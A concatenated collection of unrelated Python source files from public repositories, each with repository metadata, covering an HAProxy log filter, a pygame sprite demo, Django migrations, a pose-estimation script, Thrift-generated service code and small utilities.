b129c9b11e9d2c06114f45ce03a94f4f2a177119
|
/hugin/haproxy/filters/userstate.py
|
c25adced17d38446916ca97be7ca2a70eced1dc0
|
[] |
no_license
|
pyfidelity/hugin.haproxy
|
a9e48e345b03ed9d361c0d6c8617135378f5c311
|
444e30350936883e7749c2371f394fa82c1644fe
|
refs/heads/master
| 2016-09-01T17:29:48.210244
| 2014-11-24T12:34:51
| 2014-11-24T12:34:51
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,529
|
py
|
# Userstate is about detecting when users switch backend node when session affinity is used.
import re
from hugin.haproxy import registerFilter
from collections import deque
COOKIEMATCH = re.compile('.*="?(?P<cookie>\S+)')
class UserState(object):
def __init__(self):
self.duplicates = 0 # Redundant reloads where user press stop or reload
self.redispatch = 0 # Session affinity redispatch
self.affinity = 0 # Session affinity where previous 4 request were to the same instance
self.status = {} # Keep track of last 4 requests for each uid
def process(self, data):
#match = COOKIEMATCH.match(data['reqcookie'])
#if match:
# uid = match.group('cookie')
reqcookie = data.get('reqcookie', None)
if reqcookie is not None and len(reqcookie) > 1:
uid = reqcookie[6:] # __ac="cookieval...
hist = self.status.get(uid, deque(maxlen=4)) # We keep track of the 4 last requests
previous = hist and hist[0]
instance = data['instance']
if previous:
# Detect redundant reloads - C is client abort
if previous['terminationevent'] == 'C' and previous['url'] == data['url']:
self.duplicates += 1
# Check for session affinity
if previous['instance'] == instance:
for item in hist:
if item['instance'] != instance:
break # Different instance, no affinity
self.affinity += 1
# We only check for redispatch or affinity if we have a full history
elif len(hist) == 4:
# Check for redispatch
instances = set([h['instance'] for h in hist])
if len(instances) == 1:
self.redispatch += 1
hist.appendleft(dict(url=data['url'],
terminationevent=data['terminationevent'],
instance=instance,))
self.status[uid] = hist
return data
def stats(self, reset=True, count=20):
duplicates, redispatch, affinity = self.duplicates, self.redispatch, self.affinity
if reset:
self.duplicates = self.redispatch = self.affinity = 0
return dict(duplicates=duplicates,
redispatch=redispatch,
affinity=affinity)
registerFilter('userstate', UserState())
|
[
"florian.schulze@gmx.net"
] |
florian.schulze@gmx.net
|
0535d5b25645641c17f7429e27beadf5cbf303d1
|
1b6fd0e1da9aa6d28b19540887ffcb5233ac3692
|
/Resources/RP01/P01.3/sprites_001.py
|
8bd0fb678689dd03c92fa1ffe7d2cdabc160fd01
|
[] |
no_license
|
rugbyprof/4443-2D-PyGame
|
a637cd1237f90ca30a484d9fb2b6738571777d8c
|
bba26f794bd85599cf0598c1c64feec59fa31246
|
refs/heads/master
| 2022-11-27T14:14:54.982351
| 2020-08-05T19:32:45
| 2020-08-05T19:32:45
| 271,365,653
| 3
| 5
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,735
|
py
|
"""
Sprite Helper
Description:
Loading a sprite animation and displaying it.
Problems using a single instance of image.
"""
# Import and initialize the pygame library
import pygame
import random
import json
import pprint
import sys
import os
import math
import glob
from helper_module import rgb_colors
from helper_module import mykwargs
from helper_module import straightDistance
from helper_module import getCardinalDirection
# Import pygame.locals for easier access to key coordinates
# Updated to conform to flake8 and black standards
from pygame.locals import (
K_UP,
K_DOWN,
K_LEFT,
K_RIGHT,
K_ESCAPE,
KEYDOWN,
QUIT,
)
# Keep up with the config stuff. Adding sprite sheets for
# characters and other graphics now
config = {
'title' :'P01.3 Pygame Sprite Movement',
'window_size' : {
'width' : 640,
'height' : 480
},
'sprite_sheets':{
'explosion_01':{'path':'./media/fx/explosion_01'},
'green_monster':{'path':'./media/characters/green_monster'}
},
'background':'./media/backgrounds/tile_1000x1000_40_light.png',
'fps':60
}
colors = rgb_colors('colors.json')
def LoadSpriteImages(path):
""" Load sprite images into either a dictionary of moves or a list of images depending
on whether the "sprite" is a multi move character or a single effect with just frames
to play.
This method reads a json file looking for the following formats (right now):
"""
if not os.path.isdir(path):
print(f"Error: {path} not a valid sprite folder!")
sys.exit()
if not os.path.isfile(os.path.join(path,"moves.json")):
print(f"Error: 'moves.json' is required to be in folder!")
sys.exit()
# open the json file thats expected to be in the folder
# and read it in as a string
f = open(os.path.join(path,"moves.json"),"r")
# make raw string into a python dictionary
sprite_info = json.loads(f.read())
# base name is used to build filename
base_name = sprite_info['base_name']
# ext as well
ext = sprite_info['ext']
# If moves is a key in the dictionary then we create a dictionary of
# of moves where each move points to a list of images for that move
if 'moves' in sprite_info:
moves = {}
for move,nums in sprite_info['moves'].items():
images = []
for num in nums:
images.append(os.path.join(path,base_name+num+ext))
moves[move] = images
return moves
# If frames in the dictionary, then its an effect with a list of images
# for that effect. We need to order them before return since glob
# doesn't get directory items in order.
elif 'frames' in sprite_info:
images = sprite_info['frames']
if type(images) == list:
pass
elif type(images) == str and images == '*':
images = glob.glob(os.path.join(path,'*'+ext))
images.sort()
return images
else:
print(f"Error: 'moves' or 'frames' key not in json!!")
sys.exit()
class Explosion(pygame.sprite.Sprite):
def __init__(self, **kwargs):
# Initiate this sprite
pygame.sprite.Sprite.__init__(self)
# get location of sprites for this animation
fx_sprites = kwargs.get('fx_sprites',None)
# if not throw error
if not fx_sprites:
print("Error: Need location of fx_sprites!")
sys.exit(0)
self.center = kwargs.get('loc',(0,0))
# This function finds the json file and loads all the
# image names into a list
self.images = LoadSpriteImages(fx_sprites)
# container for all the pygame images
self.frames = []
# load images and "convert" them. (see link at top for explanation)
for image in self.images:
self.frames.append(pygame.image.load(image))
# animation variables
self.frame = 0
self.last_update = pygame.time.get_ticks()
self.frame_rate = 0 # smaller = faster
# prime the animation
self.image = self.frames[0]
self.rect = self.image.get_rect()
self.rect.center = self.center
def setLocation(self,loc):
""" Set the center of the explosion
"""
self.center = loc
self.rect.center = loc
def update(self):
""" Overloaded method from sprite which gets called by the game loop when
a sprite group gets updated
"""
now = pygame.time.get_ticks() # get current game clock
if now - self.last_update > self.frame_rate: #
self.last_update = now
self.frame += 1
if self.frame == len(self.frames):
self.kill()
self.frame = 0
else:
center = self.rect.center
self.image = self.frames[self.frame]
self.rect = self.image.get_rect()
self.rect.center = center
def main():
pygame.init()
# sets the window title
pygame.display.set_caption(config['title'])
# Game size of game window from config
width = config['window_size']['width']
height = config['window_size']['height']
# Set up the drawing window
screen = pygame.display.set_mode((width,height))
# load our background
background = pygame.image.load(config['background'])
# sprite group to handle all the visuals
all_sprites = pygame.sprite.Group()
# help control event timing
clock = pygame.time.Clock()
e = Explosion(fx_sprites=config['sprite_sheets']['explosion_01']['path'])
# Run until the user asks to quit
# game loop
running = True
while running:
clock.tick(config['fps'])
# fill screen with white
screen.fill(colors['white'])
# show background grid (no moving it)
screen.blit(background, (0,0))
for event in pygame.event.get():
if event.type == pygame.QUIT:
running = False
if event.type == pygame.KEYDOWN:
event.key
if event.type == pygame.KEYUP:
event.key
if event.type == pygame.MOUSEMOTION:
pass
if event.type == pygame.MOUSEBUTTONUP:
print(pygame.mouse.get_pos())
e.setLocation(pygame.mouse.get_pos())
all_sprites.add(e)
all_sprites.update()
all_sprites.draw(screen)
pygame.display.flip()
# Done! Time to quit.
pygame.quit()
if __name__=='__main__':
main()
|
[
"terry.griffin@msutexas.edu"
] |
terry.griffin@msutexas.edu
|
a90e6404551b5912048b4829a5294fbb441ab70e
|
93a95c5b9411960b394cfb63e400910d7d1abf50
|
/estoque/migrations/0002_auto_20210510_1515.py
|
ea13d302de4b62141beacc1712e501fe83515d36
|
[
"MIT"
] |
permissive
|
jonathan-mothe/estoque
|
9377e4ac826fabe9d1a4f66f817204334a59a311
|
de8d0ea87e67e93ad4922a2d81b1ba7d68a29845
|
refs/heads/master
| 2023-04-21T19:08:07.579886
| 2021-05-11T17:46:31
| 2021-05-11T17:46:31
| 364,916,799
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,283
|
py
|
# Generated by Django 3.2.2 on 2021-05-10 18:15
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('estoque', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='EstoqueEntrada',
fields=[
],
options={
'verbose_name': 'estoque estrada',
'verbose_name_plural': 'estoque entrada',
'proxy': True,
'indexes': [],
'constraints': [],
},
bases=('estoque.estoque',),
),
migrations.CreateModel(
name='EstoqueSaida',
fields=[
],
options={
'verbose_name': 'estoque saída',
'verbose_name_plural': 'estoque saída',
'proxy': True,
'indexes': [],
'constraints': [],
},
bases=('estoque.estoque',),
),
migrations.AlterField(
model_name='estoqueitens',
name='estoque',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='estoques', to='estoque.estoque'),
),
]
|
[
"jonathan.mothe@gmail.com"
] |
jonathan.mothe@gmail.com
|
1fd9d339fb8682ef8a6f21a25cc9fe2d23ae8ca3
|
09bcd2a342fc79a4a7c30e24a76788d90df2176d
|
/galleria/artists/migrations/0001_initial.py
|
f3a25b6873d47bb0d9d6a0437de97740b0176461
|
[
"Apache-2.0"
] |
permissive
|
kamalhg/galleria
|
48b2ed5ef1931ee12b7247caf7e50caa167c88ff
|
18ee38e99869812e61244d62652514d1c46bf3f3
|
refs/heads/master
| 2020-12-27T12:15:22.233386
| 2014-06-18T15:53:54
| 2014-06-18T15:53:54
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,628
|
py
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Artist'
db.create_table('artists_artist', (
('created', self.gf('model_utils.fields.AutoCreatedField')(default=datetime.datetime.now)),
('modified', self.gf('model_utils.fields.AutoLastModifiedField')(default=datetime.datetime.now)),
('contact', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['contacts.Contact'], primary_key=True, unique=True)),
('gallery_id', self.gf('django.db.models.fields.IntegerField')()),
('biography', self.gf('django.db.models.fields.TextField')()),
('price', self.gf('django.db.models.fields.TextField')()),
('info', self.gf('django.db.models.fields.TextField')()),
('commission', self.gf('django.db.models.fields.DecimalField')(decimal_places=3, max_digits=4)),
))
db.send_create_signal('artists', ['Artist'])
def backwards(self, orm):
# Deleting model 'Artist'
db.delete_table('artists_artist')
models = {
'artists.artist': {
'Meta': {'object_name': 'Artist'},
'biography': ('django.db.models.fields.TextField', [], {}),
'commission': ('django.db.models.fields.DecimalField', [], {'decimal_places': '3', 'max_digits': '4'}),
'contact': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['contacts.Contact']", 'primary_key': 'True', 'unique': 'True'}),
'created': ('model_utils.fields.AutoCreatedField', [], {'default': 'datetime.datetime.now'}),
'gallery_id': ('django.db.models.fields.IntegerField', [], {}),
'info': ('django.db.models.fields.TextField', [], {}),
'modified': ('model_utils.fields.AutoLastModifiedField', [], {'default': 'datetime.datetime.now'}),
'price': ('django.db.models.fields.TextField', [], {})
},
'categories.category': {
'Meta': {'object_name': 'Category'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '40'})
},
'contacts.address': {
'Meta': {'object_name': 'Address'},
'city': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'contact': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contacts.Contact']"}),
'country': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'county': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'postcode': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'street': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'contacts.contact': {
'Meta': {'object_name': 'Contact'},
'addressed_as': ('django.db.models.fields.CharField', [], {'default': "'calculated'", 'max_length': '100'}),
'addressed_as_custom': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255', 'blank': 'True'}),
'categories': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'null': 'True', 'blank': 'True', 'to': "orm['categories.Category']"}),
'company': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '100', 'blank': 'True'}),
'company_or_individual': ('django.db.models.fields.CharField', [], {'default': "'individual'", 'max_length': '10'}),
'created': ('model_utils.fields.AutoCreatedField', [], {'default': 'datetime.datetime.now'}),
'department': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '100', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'job_title': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '100', 'blank': 'True'}),
'main_address': ('django.db.models.fields.related.ForeignKey', [], {'null': 'True', 'to': "orm['contacts.Address']", 'blank': 'True', 'related_name': "'main_address'"}),
'main_phonenumber': ('django.db.models.fields.related.ForeignKey', [], {'null': 'True', 'to': "orm['contacts.PhoneNumber']", 'blank': 'True', 'related_name': "'main_phonenumber'"}),
'migration_id': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'modified': ('model_utils.fields.AutoLastModifiedField', [], {'default': 'datetime.datetime.now'}),
'name_first': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '100', 'blank': 'True'}),
'name_last': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '100', 'blank': 'True'}),
'name_middle': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '100', 'blank': 'True'}),
'reference': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255', 'blank': 'True'}),
'suffix': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '100', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '100', 'blank': 'True'}),
'type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contacts.ContactType']"})
},
'contacts.contacttype': {
'Meta': {'object_name': 'ContactType'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '30'})
},
'contacts.phonenumber': {
'Meta': {'object_name': 'PhoneNumber'},
'contact': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contacts.Contact']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'number': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '100'})
}
}
complete_apps = ['artists']
|
[
"hum3@drummond.info"
] |
hum3@drummond.info
|
a0d0b8457024d2982d5052c463bd38f342cf93d4
|
e18f0a32703fbe841d27c8a0e55eca9b9ab39cce
|
/run.py
|
c3e6569870cc01a9823fac62025ce182b58ea349
|
[
"Apache-2.0"
] |
permissive
|
qybing/tf-pose-estimation
|
302550e74d457edea178b8e36a9cd58c1cbe89e8
|
9adc3d4bf1c87fba4df977b83cee8e656882fe15
|
refs/heads/master
| 2023-04-10T08:59:08.778691
| 2019-06-19T06:11:49
| 2019-06-19T06:11:49
| 189,166,320
| 0
| 0
|
Apache-2.0
| 2023-03-25T00:06:18
| 2019-05-29T06:44:17
|
PureBasic
|
UTF-8
|
Python
| false
| false
| 3,518
|
py
|
import argparse
import logging
import sys
import time
from tf_pose import common
import cv2
import numpy as np
from tf_pose.estimator import TfPoseEstimator
from tf_pose.networks import get_graph_path, model_wh
logger = logging.getLogger('TfPoseEstimatorRun')
logger.handlers.clear()
logger.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
formatter = logging.Formatter('[%(asctime)s] [%(name)s] [%(levelname)s] %(message)s')
ch.setFormatter(formatter)
logger.addHandler(ch)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='tf-pose-estimation run')
parser.add_argument('--image', type=str, default='./images/p1.jpg')
parser.add_argument('--model', type=str, default='mobilenet_thin',
help='cmu / mobilenet_thin / mobilenet_v2_large / mobilenet_v2_small')
parser.add_argument('--resize', type=str, default='0x0',
help='if provided, resize images before they are processed. '
'default=0x0, Recommends : 432x368 or 656x368 or 1312x736 ')
parser.add_argument('--resize-out-ratio', type=float, default=4.0,
help='if provided, resize heatmaps before they are post-processed. default=1.0')
args = parser.parse_args()
w, h = model_wh(args.resize)
if w == 0 or h == 0:
e = TfPoseEstimator(get_graph_path(args.model), target_size=(432, 368))
else:
e = TfPoseEstimator(get_graph_path(args.model), target_size=(w, h))
# estimate human poses from a single image !
image = common.read_imgfile(args.image, None, None)
if image is None:
logger.error('Image can not be read, path=%s' % args.image)
sys.exit(-1)
t = time.time()
humans = e.inference(image, resize_to_default=(w > 0 and h > 0), upsample_size=args.resize_out_ratio)
elapsed = time.time() - t
logger.info('inference image: %s in %.4f seconds.' % (args.image, elapsed))
image = TfPoseEstimator.draw_humans(image, humans, imgcopy=False)
try:
import matplotlib.pyplot as plt
fig = plt.figure()
a = fig.add_subplot(2, 2, 1)
a.set_title('Result')
plt.imshow(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))
bgimg = cv2.cvtColor(image.astype(np.uint8), cv2.COLOR_BGR2RGB)
bgimg = cv2.resize(bgimg, (e.heatMat.shape[1], e.heatMat.shape[0]), interpolation=cv2.INTER_AREA)
# show network output
a = fig.add_subplot(2, 2, 2)
plt.imshow(bgimg, alpha=0.5)
tmp = np.amax(e.heatMat[:, :, :-1], axis=2)
plt.imshow(tmp, cmap=plt.cm.gray, alpha=0.5)
plt.colorbar()
tmp2 = e.pafMat.transpose((2, 0, 1))
tmp2_odd = np.amax(np.absolute(tmp2[::2, :, :]), axis=0)
tmp2_even = np.amax(np.absolute(tmp2[1::2, :, :]), axis=0)
a = fig.add_subplot(2, 2, 3)
a.set_title('Vectormap-x')
# plt.imshow(CocoPose.get_bgimg(inp, target_size=(vectmap.shape[1], vectmap.shape[0])), alpha=0.5)
plt.imshow(tmp2_odd, cmap=plt.cm.gray, alpha=0.5)
plt.colorbar()
a = fig.add_subplot(2, 2, 4)
a.set_title('Vectormap-y')
# plt.imshow(CocoPose.get_bgimg(inp, target_size=(vectmap.shape[1], vectmap.shape[0])), alpha=0.5)
plt.imshow(tmp2_even, cmap=plt.cm.gray, alpha=0.5)
plt.colorbar()
plt.show()
except Exception as e:
logger.warning('matplitlib error, %s' % e)
cv2.imshow('result', image)
cv2.waitKey()
|
[
"qiaoyanbing1@163.com"
] |
qiaoyanbing1@163.com
|
bd94282c6683da22e869c64a0dd76f5ba27d7158
|
35c1dcb0c8a713725a8d9d3062df26b096a4c150
|
/setup.py
|
295d74e177fe1a2cc941145ea359d2970b74527a
|
[
"MIT"
] |
permissive
|
ijgarcesc/pybiblio
|
84fc78c09866a65bd13945ab36c8841587d74f09
|
02428eba8c4fcef3f9311ca9ba7be6bab661ca9e
|
refs/heads/master
| 2021-07-15T07:40:08.319875
| 2017-10-18T13:57:08
| 2017-10-18T13:57:08
| 105,827,028
| 0
| 0
| null | 2017-10-04T22:48:12
| 2017-10-04T22:48:12
| null |
UTF-8
|
Python
| false
| false
| 899
|
py
|
from setuptools import setup
def readme():
with open('README.md') as f:
return f.read()
setup(name='pybiblio',
version='0.0.0',
description='Analysis of bibliographic information using python',
long_description='A tool for creating and gradding assignments in the Jupyter Notebook using the Virtual Programming Lab plugging and Moodle',
classifiers=[
'Development Status :: 3 - Alpha',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3.5',
'Intended Audience :: Education',
'License :: Free For Educational Use',
],
keywords='Scopus',
url='http://github.com/jdvelasq/pybiblio',
author='Juan D. Velasquez, Johana Garces',
author_email='jdvelasq@unal.edu.co',
license='MIT',
packages=['pybibio'],
include_package_data=True,
zip_safe=False)
|
[
"jdvelasq@unal.edu.co"
] |
jdvelasq@unal.edu.co
|
3245b49aa803d9fd7eaad75b78856c0dd540cbf0
|
1d4adeca605818749247235dba11a90fbc154748
|
/deprecated/services/deployment/deployment_controller.py
|
6ccff0b553fb38655e4e8f6737b142ce9a9a71f7
|
[
"Apache-2.0"
] |
permissive
|
joshish-iu/cloudmesh-nist
|
4598cd884fb9faaef5ea5cc5fa3e3920dbc6ebff
|
c26952859c2230231420058f6c488c9f6cc73218
|
refs/heads/master
| 2020-05-26T13:11:51.730994
| 2019-05-21T10:42:28
| 2019-05-21T10:42:28
| 188,243,290
| 0
| 0
|
NOASSERTION
| 2019-05-23T13:48:49
| 2019-05-23T13:48:48
| null |
UTF-8
|
Python
| false
| false
| 905
|
py
|
import connexion
import six
#from deployment_controller import *
from swagger_server.models.deployment import Deployment # noqa: E501
from swagger_server import util
from pymongo import MongoClient
client = MongoClient()
db = client['cm']
deployments = db['deployment']
def get_deployment():
"""
:return: list all the deployments as a list
"""
# ok
return list(deployments.find({}, {'_id': False}))
def add_deployment(deployment=None):
# ok
if connexion.request.is_json:
deployment = Deployment.from_dict(deployment)
deployments.insert(deployment.to_dict())
return deployment
def get_deployment_by_name(name):
# BUG: not yet gaurantiied there is only one name
for element in deployments.find({'name':name}):
return (element['name'],
element['description'],
element['value'],
element['kind'])
|
[
"laszewski@gmail.com"
] |
laszewski@gmail.com
|
63049adb954204a6d260ac373203abbc430dd063
|
67568ac53039fd633f9017bd368a13258191e1b2
|
/thrift_example/file_transport/file/FileService.py
|
429826b7eddda8fd50d339c35c87f6a40c1cd0ea
|
[] |
no_license
|
starryrbs/rpc_shared
|
22012bbb5e0916a178e088f1be58acedd589c13d
|
6e4feb2929337ccb885ff629c13a0a6d3bc457d2
|
refs/heads/master
| 2022-12-11T04:27:24.176393
| 2020-09-02T16:01:37
| 2020-09-02T16:01:37
| 291,492,629
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| true
| 7,528
|
py
|
#
# Autogenerated by Thrift Compiler (0.12.0)
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
#
# options string: py
#
from thrift.Thrift import TType, TMessageType, TFrozenDict, TException, TApplicationException
from thrift.protocol.TProtocol import TProtocolException
from thrift.TRecursive import fix_spec
import sys
import logging
from .ttypes import *
from thrift.Thrift import TProcessor
from thrift.transport import TTransport
all_structs = []
class Iface(object):
def uploadFile(self, filedata):
"""
Parameters:
- filedata
"""
pass
class Client(Iface):
def __init__(self, iprot, oprot=None):
self._iprot = self._oprot = iprot
if oprot is not None:
self._oprot = oprot
self._seqid = 0
def uploadFile(self, filedata):
"""
Parameters:
- filedata
"""
self.send_uploadFile(filedata)
return self.recv_uploadFile()
def send_uploadFile(self, filedata):
self._oprot.writeMessageBegin('uploadFile', TMessageType.CALL, self._seqid)
args = uploadFile_args()
args.filedata = filedata
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_uploadFile(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = uploadFile_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "uploadFile failed: unknown result")
class Processor(Iface, TProcessor):
def __init__(self, handler):
self._handler = handler
self._processMap = {}
self._processMap["uploadFile"] = Processor.process_uploadFile
def process(self, iprot, oprot):
(name, type, seqid) = iprot.readMessageBegin()
if name not in self._processMap:
iprot.skip(TType.STRUCT)
iprot.readMessageEnd()
x = TApplicationException(TApplicationException.UNKNOWN_METHOD, 'Unknown function %s' % (name))
oprot.writeMessageBegin(name, TMessageType.EXCEPTION, seqid)
x.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
return
else:
self._processMap[name](self, seqid, iprot, oprot)
return True
def process_uploadFile(self, seqid, iprot, oprot):
args = uploadFile_args()
args.read(iprot)
iprot.readMessageEnd()
result = uploadFile_result()
try:
result.success = self._handler.uploadFile(args.filedata)
msg_type = TMessageType.REPLY
except TTransport.TTransportException:
raise
except TApplicationException as ex:
logging.exception('TApplication exception in handler')
msg_type = TMessageType.EXCEPTION
result = ex
except Exception:
logging.exception('Unexpected exception in handler')
msg_type = TMessageType.EXCEPTION
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("uploadFile", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
# HELPER FUNCTIONS AND STRUCTURES
class uploadFile_args(object):
"""
Attributes:
- filedata
"""
def __init__(self, filedata=None,):
self.filedata = filedata
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.filedata = File()
self.filedata.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('uploadFile_args')
if self.filedata is not None:
oprot.writeFieldBegin('filedata', TType.STRUCT, 1)
self.filedata.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
all_structs.append(uploadFile_args)
uploadFile_args.thrift_spec = (
None, # 0
(1, TType.STRUCT, 'filedata', [File, None], None, ), # 1
)
class uploadFile_result(object):
"""
Attributes:
- success
"""
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.BOOL:
self.success = iprot.readBool()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('uploadFile_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.BOOL, 0)
oprot.writeBool(self.success)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
all_structs.append(uploadFile_result)
uploadFile_result.thrift_spec = (
(0, TType.BOOL, 'success', None, None, ), # 0
)
fix_spec(all_structs)
del all_structs
|
[
"1322096624@qq.com"
] |
1322096624@qq.com
|
5cb291f086a1a6e113110c2af91826068dd57189
|
255e19ddc1bcde0d3d4fe70e01cec9bb724979c9
|
/all-gists/4287546/snippet.py
|
9124f440cdeccffaef8a4bd8d92dd5e133c999f6
|
[
"MIT"
] |
permissive
|
gistable/gistable
|
26c1e909928ec463026811f69b61619b62f14721
|
665d39a2bd82543d5196555f0801ef8fd4a3ee48
|
refs/heads/master
| 2023-02-17T21:33:55.558398
| 2023-02-11T18:20:10
| 2023-02-11T18:20:10
| 119,861,038
| 76
| 19
| null | 2020-07-26T03:14:55
| 2018-02-01T16:19:24
|
Python
|
UTF-8
|
Python
| false
| false
| 680
|
py
|
# FROM: http://en.wikipedia.org/wiki/Base_36#Python_implementation
def base36encode(number):
"""Converts an integer into a base36 string."""
ALPHABET = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"
if not isinstance(number, (int, long)):
raise TypeError('This function must be called on an integer.')
base36 = ''
sign = ''
if number < 0:
sign = '-'
number = -number
if 0 <= number < len(ALPHABET):
return sign + ALPHABET[number]
while number != 0:
number, i = divmod(number, len(ALPHABET))
base36 = ALPHABET[i] + base36
return sign + base36
def base36decode(number):
return int(number, 36)
|
[
"gistshub@gmail.com"
] |
gistshub@gmail.com
|
666459957700b84b14bec98f21fbd9d2c6441c2b
|
7236d1d4873faa9735fd5e2d4598b211a370f731
|
/project/n/projects/projects/ecommapp/ecommerce/migrations/0020_auto_20200928_1630.py
|
7ceab26f28c88cea212b50ab80571813c500c591
|
[] |
no_license
|
Dreambigxz/my_first_django_app
|
05f5a5d330d72084489f9306fca9ca232af13999
|
9e21ebcbe63c7394280558d2977ef8a796960e0d
|
refs/heads/main
| 2023-01-03T18:45:20.712074
| 2020-10-23T09:05:47
| 2020-10-23T09:05:47
| 306,180,592
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 496
|
py
|
# Generated by Django 3.0.8 on 2020-09-28 15:30
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('ecommerce', '0019_products_color'),
]
operations = [
migrations.AlterField(
model_name='products',
name='color',
field=models.CharField(choices=[('YL', 'Yellow'), ('RD', 'Red'), ('OR', 'Orange'), ('GR', 'Green')], default='RD', max_length=200),
),
]
|
[
"onyemordidaniel@gmail.com"
] |
onyemordidaniel@gmail.com
|
0209945db389ffcf041bf8356b57309837cca01c
|
bc233c24523f05708dd1e091dca817f9095e6bb5
|
/bitmovin_api_sdk/models/profile_h262.py
|
b8e281c4665dfd372553426648bec8a362d66ae8
|
[
"MIT"
] |
permissive
|
bitmovin/bitmovin-api-sdk-python
|
e3d6cf8eb8bdad62cb83ec77c0fc4950b06b9cdd
|
b0860c0b1be7747cf22ad060985504da625255eb
|
